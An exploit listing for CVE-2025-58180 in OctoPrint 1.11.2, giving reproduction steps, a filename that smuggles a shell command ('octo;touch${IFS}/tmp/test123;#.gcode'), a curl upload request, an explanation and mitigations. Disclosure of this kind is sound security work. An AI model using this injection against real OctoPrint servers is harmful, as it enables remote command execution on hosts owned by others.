Share
## https://sploitus.com/exploit?id=PACKETSTORM:215042
# Exploit Title: OctoPrint 1.11.2 - File Upload 
    # Date: 2025-09-28
    # Exploit Author: prabhatverma.addada
    # Vendor Homepage: https://octoprint.org
    # Software Link: https://github.com/OctoPrint/OctoPrint
    # Affected Version(s): <= 1.11.2
    # Patched Version(s): 1.11.3
    # CVE: CVE-2025-58180
    # CVSS (per advisory): 7.5
    # Platform: Linux / OctoPrint server
    # Type: Remote Code Execution (requires authenticated upload / API key or session)
    #
    # Short description:
    # An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
    # sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
    #
    # Scope & privileges:
    # - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
    # - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
    #
    # Tested on:
    # - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
    #
    # Reproduction / PoC (manual):
    #
    # 1) Start OctoPrint 1.11.2:
    #    octoprint serve --port 5000 --debug
    #    Complete initial setup at http://127.0.0.1:5000 and create an admin user.
    #
    # 2) Configure a system event handler that runs shell commands with filename placeholders:
    #    Edit ~/.octoprint/config.yaml and add:
    #
    #    events:
    #      enabled: true
    #      subscriptions:
    #        - event: FileAdded
    #          type: system
    #          debug: true
    #          command: "{path}"
    #
    #    Restart OctoPrint.
    #
    # 3) Create a harmless test gcode:
    #    mkdir -p /tmp/gcode
    #    cat > /tmp/gcode/ok.gcode <<'EOF'
    #    ; minimal gcode
    #    G28
    #    M105
    #    EOF
    #
    # 4) Obtain API key from Settings -> API and export it:
    #    export API_KEY='<your_api_key_here>'
    #
    # 5) Ensure target proof file does not exist:
    #    ls -la /tmp/test123
    #
    # 6) PoC upload (non-destructive proof):
    #    INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
    #
    #    curl -sS -X POST -H "X-Api-Key: $API_KEY" \
    #      -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
    #      "http://127.0.0.1:5000/api/files/local"
    #
    # 7) Verify execution:
    #    ls -la /tmp/test123
    #    If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
    #
    # Explanation:
    # - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
    # - FileAdded event payload contains the filename/path.
    # - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
    # - Shell metacharacters in the filename are interpreted by the shell and executed.
    #
    # Mitigations / Workarounds:
    # - Upgrade OctoPrint to 1.11.3 (patched).
    # - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
    # - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
    # - Do not expose OctoPrint to hostile networks; restrict upload access.
    #
    # References:
    # - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
    # - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
    #
    # Notes for triage:
    # - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
    # - PoC uses non-destructive `touch /tmp/test123`.